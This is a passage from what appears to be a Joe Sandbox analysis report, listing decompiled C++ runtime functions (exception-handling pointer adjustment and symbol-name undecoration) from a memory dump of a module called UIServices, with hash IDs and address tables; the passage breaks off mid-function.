                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                    • String ID: api-ms-
                                                    • API String ID: 916704608-2084034818
                                                    • Opcode ID: 50289bf7fa0a5523f363f78bcb6a1aea16f58e5e8faf93b21409ccf8cdf9de00
                                                    • Instruction ID: c385deb064d9ed24602dc85933c87432206dbf6174b59d28eae4a240a7eeff35
                                                    • Opcode Fuzzy Hash: 50289bf7fa0a5523f363f78bcb6a1aea16f58e5e8faf93b21409ccf8cdf9de00
                                                    • Instruction Fuzzy Hash: 6431F621B0AA7A81EE15EB0AAC041B563A8FF84BB0F490775DD2D67390DF3CE154CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00007FFC7FFC23C6252C(signed int __ecx, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, signed char* __r9, void* __r11, long long _a8, long long _a16, long long _a24) {
                                                    				intOrPtr _v40;
                                                    				void* _t44;
                                                    				void* _t45;
                                                    				void* _t47;
                                                    				void* _t91;
                                                    				long long _t94;
                                                    				long long _t106;
                                                    				long long* _t127;
                                                    				signed char* _t138;
                                                    
                                                    				_t91 = __rax;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_a24 = __rdi;
                                                    				_t138 = __r9;
                                                    				if ( *((intOrPtr*)(__r8 + 8)) == 0) goto 0x23c62568;
                                                    				E00007FFC7FFC23C6F044(__rax);
                                                    				goto 0x23c6256e;
                                                    				r15d = 0;
                                                    				if (__rdi == 0) goto 0x23c626f7;
                                                    				if (r15d == 0) goto 0x23c6258d;
                                                    				E00007FFC7FFC23C6F044(_t91);
                                                    				goto 0x23c62590;
                                                    				if ( *((intOrPtr*)(__rdi + 0x10)) == dil) goto 0x23c626f7;
                                                    				if ( *((intOrPtr*)(__r8 + 0xc)) != 0) goto 0x23c625a8;
                                                    				if ( *(__r8 + 4) >= 0) goto 0x23c626f7;
                                                    				if ( *(__r8 + 4) < 0) goto 0x23c625b6;
                                                    				_t127 =  *((intOrPtr*)(__r8 + 8)) +  *__rdx;
                                                    				if (( *(__r8 + 4) & 0x00000080) == 0) goto 0x23c625ec;
                                                    				if (( *__r9 & 0x00000010) == 0) goto 0x23c625ec;
                                                    				_t94 =  *0x23c74240; // 0x0
                                                    				if (_t94 == 0) goto 0x23c625ec;
                                                    				_t44 =  *0x23c701a0();
                                                    				if (_t94 == 0) goto 0x23c625e6;
                                                    				if (_t127 == 0) goto 0x23c625e6;
                                                    				 *_t127 = _t94;
                                                    				goto 0x23c62642;
                                                    				abort();
                                                    				if (( *(__r8 + 4) & 0x00000008) == 0) goto 0x23c6260b;
                                                    				_t106 =  *((intOrPtr*)(__rcx + 0x28));
                                                    				if (_t106 == 0) goto 0x23c62605;
                                                    				if (_t127 == 0) goto 0x23c62605;
                                                    				 *_t127 = _t106;
                                                    				goto 0x23c62642;
                                                    				abort();
                                                    				if (( *__r9 & 0x00000001) == 0) goto 0x23c62659;
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0x23c62653;
                                                    				if (_t127 == 0) goto 0x23c62653;
                                                    				_t45 = E00007FFC7FFC23C612F0(_t44, _t127,  *((intOrPtr*)(__rcx + 0x28)), __r9[0x14]);
                                                    				if (__r9[0x14] != 8) goto 0x23c626e5;
                                                    				if ( *_t127 == __rdi) goto 0x23c626e5;
                                                    				E00007FFC7FFC23C62130(_t45,  *_t127,  &(__r9[8]));
                                                    				 *_t127 = _t94;
                                                    				goto 0x23c626e5;
                                                    				abort();
                                                    				if ( *((intOrPtr*)(_t138 + 0x18)) == 0) goto 0x23c6266e;
                                                    				_t47 = E00007FFC7FFC23C6F058(_t94);
                                                    				goto 0x23c62673;
                                                    				if (__rdi != 0) goto 0x23c626aa;
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x23c626a4;
                                                    				if (_t127 == 0) goto 0x23c626a4;
                                                    				E00007FFC7FFC23C612F0(E00007FFC7FFC23C62130(_t47,  *((intOrPtr*)(__rcx + 0x28)), _t138 + 8), _t127, _t94,  *((intOrPtr*)(_t138 + 0x14)));
                                                    				goto 0x23c626e5;
                                                    				abort();
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x23c626e9;
                                                    				if (_t127 == 0) goto 0x23c626e9;
                                                    				if (0 == 0) goto 0x23c626ca;
                                                    				E00007FFC7FFC23C6F058(_t94);
                                                    				goto 0x23c626cd;
                                                    				if (__rdi == 0) goto 0x23c626e9;
                                                    				asm("sbb ecx, ecx");
                                                    				_v40 =  ~__ecx + 1;
                                                    				goto 0x23c626f9;
                                                    				abort();
                                                    				abort();
                                                    				return 0;
                                                    			}












                                                    0x7ffc23c6252c
                                                    0x7ffc23c6252c
                                                    0x7ffc23c62531
                                                    0x7ffc23c62536
                                                    0x7ffc23c62545
                                                    0x7ffc23c62557
                                                    0x7ffc23c6255d
                                                    0x7ffc23c62566
                                                    0x7ffc23c6256b
                                                    0x7ffc23c62571
                                                    0x7ffc23c6257a
                                                    0x7ffc23c6257c
                                                    0x7ffc23c6258b
                                                    0x7ffc23c62594
                                                    0x7ffc23c6259d
                                                    0x7ffc23c625a2
                                                    0x7ffc23c625ab
                                                    0x7ffc23c625b3
                                                    0x7ffc23c625ba
                                                    0x7ffc23c625c0
                                                    0x7ffc23c625c2
                                                    0x7ffc23c625cc
                                                    0x7ffc23c625ce
                                                    0x7ffc23c625d7
                                                    0x7ffc23c625dc
                                                    0x7ffc23c625de
                                                    0x7ffc23c625e4
                                                    0x7ffc23c625e6
                                                    0x7ffc23c625f0
                                                    0x7ffc23c625f2
                                                    0x7ffc23c625f9
                                                    0x7ffc23c625fe
                                                    0x7ffc23c62600
                                                    0x7ffc23c62603
                                                    0x7ffc23c62605
                                                    0x7ffc23c6260f
                                                    0x7ffc23c62618
                                                    0x7ffc23c6261d
                                                    0x7ffc23c62626
                                                    0x7ffc23c62630
                                                    0x7ffc23c62639
                                                    0x7ffc23c62646
                                                    0x7ffc23c6264b
                                                    0x7ffc23c6264e
                                                    0x7ffc23c62653
                                                    0x7ffc23c6265d
                                                    0x7ffc23c62663
                                                    0x7ffc23c6266c
                                                    0x7ffc23c62676
                                                    0x7ffc23c6267c
                                                    0x7ffc23c62681
                                                    0x7ffc23c6269d
                                                    0x7ffc23c626a2
                                                    0x7ffc23c626a4
                                                    0x7ffc23c626ae
                                                    0x7ffc23c626b3
                                                    0x7ffc23c626b7
                                                    0x7ffc23c626b9
                                                    0x7ffc23c626c8
                                                    0x7ffc23c626d0
                                                    0x7ffc23c626d9
                                                    0x7ffc23c626e1
                                                    0x7ffc23c626e7
                                                    0x7ffc23c626e9
                                                    0x7ffc23c626f0
                                                    0x7ffc23c62712

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1501936508-0
                                                    • Opcode ID: 45814ccc6d13f49f6fab86004c78a6726fccaccaa63af34c486a9aecf85c869c
                                                    • Instruction ID: 3b368dfc4157e14ab978d5d98f1dc9a0f71365ff5736953ab47f1f94b65ce122
                                                    • Opcode Fuzzy Hash: 45814ccc6d13f49f6fab86004c78a6726fccaccaa63af34c486a9aecf85c869c
                                                    • Instruction Fuzzy Hash: 8951C631B2EA7A81EA65DB1DDD546386394EF84F84F0582B5CE4D66788DF2CE442CB30
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00007FFC7FFC23C62348(signed int __ecx, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed char* __r8, signed char* __r9, void* __r11, long long _a8, long long _a16, long long _a24) {
                                                    				intOrPtr _v40;
                                                    				void* _t39;
                                                    				void* _t40;
                                                    				void* _t42;
                                                    				void* _t86;
                                                    				long long _t90;
                                                    				long long _t102;
                                                    				long long* _t123;
                                                    				signed char* _t134;
                                                    
                                                    				_t86 = __rax;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_a24 = __rdi;
                                                    				_t134 = __r9;
                                                    				if (__r8[4] == 0) goto 0x23c62384;
                                                    				E00007FFC7FFC23C6F044(__rax);
                                                    				goto 0x23c6238a;
                                                    				r15d = 0;
                                                    				if (__rdi == 0) goto 0x23c62510;
                                                    				if (r15d == 0) goto 0x23c623a9;
                                                    				E00007FFC7FFC23C6F044(_t86);
                                                    				goto 0x23c623ac;
                                                    				if ( *((intOrPtr*)(__rdi + 0x10)) == dil) goto 0x23c62510;
                                                    				if (__r8[8] != 0) goto 0x23c623c3;
                                                    				if ( *__r8 >= 0) goto 0x23c62510;
                                                    				if ( *__r8 < 0) goto 0x23c623d1;
                                                    				_t123 = __r8[8] +  *__rdx;
                                                    				if (( *__r8 & 0x00000080) == 0) goto 0x23c62406;
                                                    				if (( *__r9 & 0x00000010) == 0) goto 0x23c62406;
                                                    				_t90 =  *0x23c74240; // 0x0
                                                    				if (_t90 == 0) goto 0x23c62406;
                                                    				_t39 =  *0x23c701a0();
                                                    				if (_t90 == 0) goto 0x23c62400;
                                                    				if (_t123 == 0) goto 0x23c62400;
                                                    				 *_t123 = _t90;
                                                    				goto 0x23c6245b;
                                                    				abort();
                                                    				if (( *__r8 & 0x00000008) == 0) goto 0x23c62424;
                                                    				_t102 =  *((intOrPtr*)(__rcx + 0x28));
                                                    				if (_t102 == 0) goto 0x23c6241e;
                                                    				if (_t123 == 0) goto 0x23c6241e;
                                                    				 *_t123 = _t102;
                                                    				goto 0x23c6245b;
                                                    				abort();
                                                    				if (( *__r9 & 0x00000001) == 0) goto 0x23c62472;
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0x23c6246c;
                                                    				if (_t123 == 0) goto 0x23c6246c;
                                                    				_t40 = E00007FFC7FFC23C612F0(_t39, _t123,  *((intOrPtr*)(__rcx + 0x28)), __r9[0x14]);
                                                    				if (__r9[0x14] != 8) goto 0x23c624fe;
                                                    				if ( *_t123 == __rdi) goto 0x23c624fe;
                                                    				E00007FFC7FFC23C62130(_t40,  *_t123,  &(__r9[8]));
                                                    				 *_t123 = _t90;
                                                    				goto 0x23c624fe;
                                                    				abort();
                                                    				if ( *((intOrPtr*)(_t134 + 0x18)) == 0) goto 0x23c62487;
                                                    				_t42 = E00007FFC7FFC23C6F058(_t90);
                                                    				goto 0x23c6248c;
                                                    				if (__rdi != 0) goto 0x23c624c3;
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x23c624bd;
                                                    				if (_t123 == 0) goto 0x23c624bd;
                                                    				E00007FFC7FFC23C612F0(E00007FFC7FFC23C62130(_t42,  *((intOrPtr*)(__rcx + 0x28)), _t134 + 8), _t123, _t90,  *((intOrPtr*)(_t134 + 0x14)));
                                                    				goto 0x23c624fe;
                                                    				abort();
                                                    				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x23c62502;
                                                    				if (_t123 == 0) goto 0x23c62502;
                                                    				if (0 == 0) goto 0x23c624e3;
                                                    				E00007FFC7FFC23C6F058(_t90);
                                                    				goto 0x23c624e6;
                                                    				if (__rdi == 0) goto 0x23c62502;
                                                    				asm("sbb ecx, ecx");
                                                    				_v40 =  ~__ecx + 1;
                                                    				goto 0x23c62512;
                                                    				abort();
                                                    				abort();
                                                    				return 0;
                                                    			}












                                                    0x7ffc23c62348
                                                    0x7ffc23c62348
                                                    0x7ffc23c6234d
                                                    0x7ffc23c62352
                                                    0x7ffc23c62361
                                                    0x7ffc23c62373
                                                    0x7ffc23c62379
                                                    0x7ffc23c62382
                                                    0x7ffc23c62387
                                                    0x7ffc23c6238d
                                                    0x7ffc23c62396
                                                    0x7ffc23c62398
                                                    0x7ffc23c623a7
                                                    0x7ffc23c623b0
                                                    0x7ffc23c623b9
                                                    0x7ffc23c623bd
                                                    0x7ffc23c623c5
                                                    0x7ffc23c623ce
                                                    0x7ffc23c623d4
                                                    0x7ffc23c623da
                                                    0x7ffc23c623dc
                                                    0x7ffc23c623e6
                                                    0x7ffc23c623e8
                                                    0x7ffc23c623f1
                                                    0x7ffc23c623f6
                                                    0x7ffc23c623f8
                                                    0x7ffc23c623fe
                                                    0x7ffc23c62400
                                                    0x7ffc23c62409
                                                    0x7ffc23c6240b
                                                    0x7ffc23c62412
                                                    0x7ffc23c62417
                                                    0x7ffc23c62419
                                                    0x7ffc23c6241c
                                                    0x7ffc23c6241e
                                                    0x7ffc23c62428
                                                    0x7ffc23c62431
                                                    0x7ffc23c62436
                                                    0x7ffc23c6243f
                                                    0x7ffc23c62449
                                                    0x7ffc23c62452
                                                    0x7ffc23c6245f
                                                    0x7ffc23c62464
                                                    0x7ffc23c62467
                                                    0x7ffc23c6246c
                                                    0x7ffc23c62476
                                                    0x7ffc23c6247c
                                                    0x7ffc23c62485
                                                    0x7ffc23c6248f
                                                    0x7ffc23c62495
                                                    0x7ffc23c6249a
                                                    0x7ffc23c624b6
                                                    0x7ffc23c624bb
                                                    0x7ffc23c624bd
                                                    0x7ffc23c624c7
                                                    0x7ffc23c624cc
                                                    0x7ffc23c624d0
                                                    0x7ffc23c624d2
                                                    0x7ffc23c624e1
                                                    0x7ffc23c624e9
                                                    0x7ffc23c624f2
                                                    0x7ffc23c624fa
                                                    0x7ffc23c62500
                                                    0x7ffc23c62502
                                                    0x7ffc23c62509
                                                    0x7ffc23c6252b

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1501936508-0
                                                    • Opcode ID: b1620596aa1ccfecfd2cdf2d8d0af50639ec59d8de270438cd69a979c246e5e7
                                                    • Instruction ID: c6196e1048083ab89d64c8559d5fe529d4ade8ea9830a3ba193d93f820866882
                                                    • Opcode Fuzzy Hash: b1620596aa1ccfecfd2cdf2d8d0af50639ec59d8de270438cd69a979c246e5e7
                                                    • Instruction Fuzzy Hash: 5251C521B1DA7A82FA669B1C9C546386394FFC4F84F0546B5CE4E66798DF2CE442CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 53%
                                                    			E00007FFC7FFC23C6CF48(void* __edx, void* __edi, long long __rbx, void* __rcx, long long __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, void* __r14, long long _a16, long long _a24) {
                                                    				void* _v8;
                                                    				signed int _v24;
                                                    				void* _v25;
                                                    				char _v40;
                                                    				char _v56;
                                                    				intOrPtr _v64;
                                                    				char _v72;
                                                    				signed int _v80;
                                                    				signed long long _v88;
                                                    				long _t35;
                                                    				intOrPtr _t43;
                                                    				void* _t45;
                                                    				signed long long _t54;
                                                    				intOrPtr* _t56;
                                                    				void* _t65;
                                                    				intOrPtr* _t70;
                                                    				intOrPtr _t87;
                                                    				intOrPtr _t88;
                                                    				void* _t92;
                                                    
                                                    				_t45 = __edx;
                                                    				_a16 = __rbx;
                                                    				_a24 = __rdi;
                                                    				_t54 =  *0x23c74038; // 0x577607bbd382
                                                    				_v24 = _t54 ^ _t92 - 0x00000070;
                                                    				_t56 =  *0x23c74360; // 0x0
                                                    				_t65 = __rcx;
                                                    				_t43 =  *_t56;
                                                    				if (_t43 != 0x58) goto 0x23c6cfaf;
                                                    				_v64 = 4;
                                                    				 *0x23c74360 = _t56 + 1;
                                                    				_v72 = "void";
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
                                                    				E00007FFC7FFC23C66CF4("void", __rcx,  &_v88);
                                                    				goto 0x23c6d08f;
                                                    				if (_t43 != 0x3f) goto 0x23c6d07a;
                                                    				E00007FFC7FFC23C6C270(__rcx,  &_v72,  &_v88, __rsi, __r8, __r10, __r11, __r14);
                                                    				if (( *0x23c74370 & 0x00004000) == 0) goto 0x23c6d031;
                                                    				_t87 =  *0x23c74378; // 0x0
                                                    				if (_t87 == 0) goto 0x23c6d031;
                                                    				_t70 = _v72;
                                                    				if (_t70 == 0) goto 0x23c6d003;
                                                    				 *0x23c701a0();
                                                    				 *((char*)( *((intOrPtr*)( *_t70 + 0x18)))) = 0;
                                                    				_t88 =  *0x23c74378; // 0x0
                                                    				goto 0x23c6d007;
                                                    				_v40 = 0;
                                                    				_t35 = atol(??);
                                                    				 *0x23c701a0();
                                                    				if (_t88 == 0) goto 0x23c6d031;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23C669EC(_t65, _t88);
                                                    				goto 0x23c6d08f;
                                                    				_v80 = 0x13;
                                                    				_v88 = "`template-parameter";
                                                    				asm("movaps xmm0, [ebp-0x50]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
                                                    				E00007FFC7FFC23C66CF4("`template-parameter",  &_v56,  &_v88);
                                                    				E00007FFC7FFC23C66F74("`template-parameter",  &_v88,  &_v72);
                                                    				r8b = 0x27;
                                                    				E00007FFC7FFC23C66FA0( &_v88, _t65);
                                                    				goto 0x23c6d08f;
                                                    				_v88 = _v88 & 0x00000000;
                                                    				_v80 = _v80 & 0x00000000;
                                                    				E00007FFC7FFC23C6B428(_t45, __edi, "`template-parameter", _t65, _t65,  &_v88, _t88, __rsi,  &_v72, __r14);
                                                    				return E00007FFC7FFC23C6F5B0(_t35, _t65, _v24 ^ _t92 - 0x00000070,  &_v88);
                                                    			}






















                                                    0x7ffc23c6cf48
                                                    0x7ffc23c6cf48
                                                    0x7ffc23c6cf4d
                                                    0x7ffc23c6cf5a
                                                    0x7ffc23c6cf64
                                                    0x7ffc23c6cf68
                                                    0x7ffc23c6cf6f
                                                    0x7ffc23c6cf72
                                                    0x7ffc23c6cf77
                                                    0x7ffc23c6cf7c
                                                    0x7ffc23c6cf83
                                                    0x7ffc23c6cf98
                                                    0x7ffc23c6cf9c
                                                    0x7ffc23c6cfa0
                                                    0x7ffc23c6cfa5
                                                    0x7ffc23c6cfaa
                                                    0x7ffc23c6cfb2
                                                    0x7ffc23c6cfbc
                                                    0x7ffc23c6cfcb
                                                    0x7ffc23c6cfcd
                                                    0x7ffc23c6cfd7
                                                    0x7ffc23c6cfd9
                                                    0x7ffc23c6cfe0
                                                    0x7ffc23c6cff1
                                                    0x7ffc23c6cff7
                                                    0x7ffc23c6cffa
                                                    0x7ffc23c6d001
                                                    0x7ffc23c6d003
                                                    0x7ffc23c6d00b
                                                    0x7ffc23c6d016
                                                    0x7ffc23c6d01f
                                                    0x7ffc23c6d021
                                                    0x7ffc23c6d02a
                                                    0x7ffc23c6d02f
                                                    0x7ffc23c6d031
                                                    0x7ffc23c6d03f
                                                    0x7ffc23c6d047
                                                    0x7ffc23c6d04f
                                                    0x7ffc23c6d054
                                                    0x7ffc23c6d064
                                                    0x7ffc23c6d069
                                                    0x7ffc23c6d073
                                                    0x7ffc23c6d078
                                                    0x7ffc23c6d07a
                                                    0x7ffc23c6d083
                                                    0x7ffc23c6d08a
                                                    0x7ffc23c6d0af

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: NameName::atol
                                                    • String ID: `template-parameter$void
                                                    • API String ID: 2130343216-4057429177
                                                    • Opcode ID: 7b16f8b45c34293ab0306f2659fb29d8749a9551dc3ca80b3c464b0063ee43ae
                                                    • Instruction ID: a0512d797bba800447477af9e3de5f6854c7c2ebd3f16a8d4dee10c9c867db82
                                                    • Opcode Fuzzy Hash: 7b16f8b45c34293ab0306f2659fb29d8749a9551dc3ca80b3c464b0063ee43ae
                                                    • Instruction Fuzzy Hash: 9D415D22F08B6A88FB009BA9DC552BC2375FB88794F940276CE4D27B59DF7C9446C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 63%
                                                    			E00007FFC7FFC23C68334(long long __rbx, long long* __rcx, long long __rdx, void* __rsi, void* __r8, long long _a8) {
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				char _v40;
                                                    				intOrPtr _v48;
                                                    				void* _v56;
                                                    				void* __rbp;
                                                    				unsigned int _t28;
                                                    				unsigned int _t33;
                                                    				intOrPtr _t37;
                                                    				char* _t48;
                                                    				char* _t49;
                                                    				intOrPtr* _t52;
                                                    				long long _t54;
                                                    				long long* _t62;
                                                    				long long _t68;
                                                    				void* _t74;
                                                    
                                                    				_t68 = __rdx;
                                                    				_a8 = __rbx;
                                                    				_t48 =  *0x23c74360; // 0x0
                                                    				_t62 = __rcx;
                                                    				if ( *_t48 == 0x58) goto 0x23c68454;
                                                    				if ( *_t48 == 0x5a) goto 0x23c68417;
                                                    				E00007FFC7FFC23C681A0(__rcx,  &_v56, __rsi, _t74, __r8);
                                                    				_t37 = _v48;
                                                    				if (_t37 != 0) goto 0x23c6840b;
                                                    				_t49 =  *0x23c74360; // 0x0
                                                    				if ( *_t49 == 0) goto 0x23c6840b;
                                                    				if ( *_t49 == 0x40) goto 0x23c68401;
                                                    				if ( *_t49 == 0x5a) goto 0x23c6839b;
                                                    				 *((intOrPtr*)(_t62 + 8)) = 0;
                                                    				 *((char*)(_t62 + 8)) = 2;
                                                    				 *_t62 = _t68;
                                                    				goto 0x23c68482;
                                                    				 *0x23c74360 = _t49 + 1;
                                                    				_t28 =  *0x23c74370; // 0x0
                                                    				if (( !(_t28 >> 0x12) & 0x00000001) == 0) goto 0x23c683c8;
                                                    				_v32 = 4;
                                                    				goto 0x23c683d6;
                                                    				_t52 = ",<ellipsis>";
                                                    				_v32 = 0xb;
                                                    				_v40 = _t52;
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23C66F48( &_v56,  &_v24,  &_v40);
                                                    				 *_t62 =  *_t52;
                                                    				 *((intOrPtr*)(_t62 + 8)) =  *((intOrPtr*)(_t52 + 8));
                                                    				goto 0x23c68482;
                                                    				 *0x23c74360 = _t52 + 1;
                                                    				_t54 = _v56;
                                                    				 *_t62 = _t54;
                                                    				 *((intOrPtr*)(_t62 + 8)) = _t37;
                                                    				goto 0x23c68482;
                                                    				 *0x23c74360 = _t54 + 1;
                                                    				_t33 =  *0x23c74370; // 0x0
                                                    				if (( !(_t33 >> 0x12) & 0x00000001) == 0) goto 0x23c68444;
                                                    				_v32 = 3;
                                                    				goto 0x23c68470;
                                                    				_v32 = 0xa;
                                                    				goto 0x23c68470;
                                                    				_v32 = 4;
                                                    				 *0x23c74360 = "<ellipsis>" + 1;
                                                    				_v40 = "void";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				return E00007FFC7FFC23C66CF4("void",  *_t52,  &_v40);
                                                    			}



















                                                    0x7ffc23c68334
                                                    0x7ffc23c68334
                                                    0x7ffc23c68341
                                                    0x7ffc23c68348
                                                    0x7ffc23c6834e
                                                    0x7ffc23c68357
                                                    0x7ffc23c68361
                                                    0x7ffc23c68366
                                                    0x7ffc23c6836d
                                                    0x7ffc23c68373
                                                    0x7ffc23c6837c
                                                    0x7ffc23c68385
                                                    0x7ffc23c6838a
                                                    0x7ffc23c6838c
                                                    0x7ffc23c6838f
                                                    0x7ffc23c68393
                                                    0x7ffc23c68396
                                                    0x7ffc23c683a2
                                                    0x7ffc23c683a9
                                                    0x7ffc23c683b6
                                                    0x7ffc23c683bf
                                                    0x7ffc23c683c6
                                                    0x7ffc23c683c8
                                                    0x7ffc23c683cf
                                                    0x7ffc23c683d6
                                                    0x7ffc23c683de
                                                    0x7ffc23c683e6
                                                    0x7ffc23c683eb
                                                    0x7ffc23c683f3
                                                    0x7ffc23c683f9
                                                    0x7ffc23c683fc
                                                    0x7ffc23c68404
                                                    0x7ffc23c6840b
                                                    0x7ffc23c6840f
                                                    0x7ffc23c68412
                                                    0x7ffc23c68415
                                                    0x7ffc23c6841e
                                                    0x7ffc23c68425
                                                    0x7ffc23c68432
                                                    0x7ffc23c6843b
                                                    0x7ffc23c68442
                                                    0x7ffc23c6844b
                                                    0x7ffc23c68452
                                                    0x7ffc23c68457
                                                    0x7ffc23c6845e
                                                    0x7ffc23c68470
                                                    0x7ffc23c68474
                                                    0x7ffc23c68478
                                                    0x7ffc23c6848f

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                    • API String ID: 2943138195-2211150622
                                                    • Opcode ID: b269d42368dc05fb67aa32e0fdf2e426be4c8343d2fb3b752ccc1771c97a5ec6
                                                    • Instruction ID: 47773ac1df02e455a4c105bdd6fdd853797a77251163e94dbbe9d5768e6e7273
                                                    • Opcode Fuzzy Hash: b269d42368dc05fb67aa32e0fdf2e426be4c8343d2fb3b752ccc1771c97a5ec6
                                                    • Instruction Fuzzy Hash: 70411472F18B6A89FB118B68EC542B837A8FB88708F844271DA4D26754DF3CA545CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 69%
                                                    			E00007FFC7FFC23C69F24(void* __edx, void* __edi, long long __rbx, long long __rcx, void* __rdi, void* __rsi, long long _a8) {
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				void* _v40;
                                                    				intOrPtr _v48;
                                                    				long long _v56;
                                                    				intOrPtr _t25;
                                                    				intOrPtr _t32;
                                                    				intOrPtr _t34;
                                                    				intOrPtr* _t47;
                                                    				intOrPtr* _t48;
                                                    				long long _t49;
                                                    				long long* _t55;
